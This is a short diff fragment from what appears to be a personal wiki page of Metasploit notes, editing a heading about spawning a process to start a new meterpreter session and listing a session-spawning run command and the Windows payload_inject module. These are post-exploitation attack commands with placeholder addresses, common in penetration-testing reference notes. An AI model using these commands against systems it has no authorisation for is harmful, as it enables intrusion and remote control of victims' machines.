okazymyrov/piki/metasploit.md

 run AMOUNT=<2>,HANDLER=<true>,SESSION=<1>,IPLIST=<payload_connect_to_ips>,LPORT=<payload_connect_to_port> <ip>
 ```

-# Spawn a new process and initiate a new meterpreter session
+# Spawn a new process and initiate a new meterpreter session from it
 ## Options
 ```ruby
 use exploit/windows/local/payload_inject